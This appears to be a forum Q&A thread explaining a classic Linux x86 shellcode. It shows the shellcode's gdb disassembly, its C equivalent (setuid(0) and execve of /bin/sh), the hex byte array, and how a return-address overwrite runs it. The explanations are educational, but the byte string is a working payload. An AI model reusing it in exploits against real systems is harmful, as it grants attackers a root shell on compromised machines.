// access argument 'argv'
mov ebx, ss:[ebp+12]
// access local variable 'ret'
mov edx, ss:[ebp-4]
...
// restore stack frame and return to caller (by popping the return address)
mov esp, ebp
pop ebp
retf
See also: Description of the procedure call sequence in C for another explanation of this topic.
The actual shellcode is:
(gdb) x /25i &shellcode
0x804a040 <shellcode>: xor %eax,%eax
0x804a042 <shellcode+2>: xor %ebx,%ebx
0x804a044 <shellcode+4>: mov $0x17,%al
0x804a046 <shellcode+6>: int $0x80
0x804a048 <shellcode+8>: jmp 0x804a069 <shellcode+41>
0x804a04a <shellcode+10>: pop %esi
0x804a04b <shellcode+11>: mov %esi,0x8(%esi)
0x804a04e <shellcode+14>: xor %eax,%eax
0x804a050 <shellcode+16>: mov %al,0x7(%esi)
0x804a053 <shellcode+19>: mov %eax,0xc(%esi)
0x804a056 <shellcode+22>: mov $0xb,%al
0x804a058 <shellcode+24>: mov %esi,%ebx
0x804a05a <shellcode+26>: lea 0x8(%esi),%ecx
0x804a05d <shellcode+29>: lea 0xc(%esi),%edx
0x804a060 <shellcode+32>: int $0x80
0x804a062 <shellcode+34>: xor %ebx,%ebx
0x804a064 <shellcode+36>: mov %ebx,%eax
0x804a066 <shellcode+38>: inc %eax
0x804a067 <shellcode+39>: int $0x80
0x804a069 <shellcode+41>: call 0x804a04a <shellcode+10>
0x804a06e <shellcode+46>: das
0x804a06f <shellcode+47>: bound %ebp,0x6e(%ecx)
0x804a072 <shellcode+50>: das
0x804a073 <shellcode+51>: jae 0x804a0dd
0x804a075 <shellcode+53>: add %al,(%eax)
This corresponds to roughly
setuid(0);
x[0] = "/bin/sh"
x[1] = 0;
execve("/bin/sh", &x[0], &x[1])
exit(0);
That string is from an old document on buffer overflows, and will execute /bin/sh. Since it's malicious code (well, when paired with a buffer exploit) - you should really include it's origin next time.
From that same document, how to code stack based exploits :
/* the shellcode is hex for: */
#include <stdio.h>
main() {
char *name[2];
name[0] = "sh";
name[1] = NULL;
execve("/bin/sh",name,NULL);
}
char shellcode[] =
"\x31\xc0\x31\xdb\xb0\x17\xcd\x80\xeb\x1f\x5e\x89\x76\x08\x31\xc0
\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c
\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/sh";
The code you included causes the contents of shellcode[] to be executed, running execve, and providing access to the shell. And the term Shellcode? From Wikipedia :
In computer security, a shellcode is a
small piece of code used as the
payload in the exploitation of a
software vulnerability. It is called
"shellcode" because it typically
starts a command shell from which the
attacker can control the compromised
machine. Shellcode is commonly written
in machine code, but any piece of code
that performs a similar task can be
called shellcode.
Without looking up all the actual opcodes to confirm, the shellcode array contains the machine code necessary to exec /bin/sh. This shellcode is machine code carefully constructed to perform the desired operation on a specific target platform and not to contain any null bytes.
The code in main() is changing the return address and the flow of execution in order to cause the program to spawn a shell by having the instructions in the shellcode array executed.
See Smashing The Stack For Fun And Profit for a description on how shellcode such as this can be created and how it might be used.
The string contains a series of bytes represented in hexadecimal.
The bytes encode a series of instructions for a particular processor on a particular platform — hopefully, yours. (Edit: if it's malware, hopefully not yours!)
The variable is defined just to get a handle to the stack. A bookmark, if you will. Then pointer arithmetic is used, again platform-dependent, to manipulate the state of the program to cause the processor to jump to and execute the bytes in the string.
Each \xXX is a hexadecimal number. One, two or three of such numbers together form an op-code (google for it). Together it forms assembly which can be executed by the machine more or less directly. And this code tries to execute the shellcode.
I think the shellcode tries to spawn a shell.
This is just spawn /bin/sh, for example in C like execve("/bin/sh", NULL, NULL);

Resources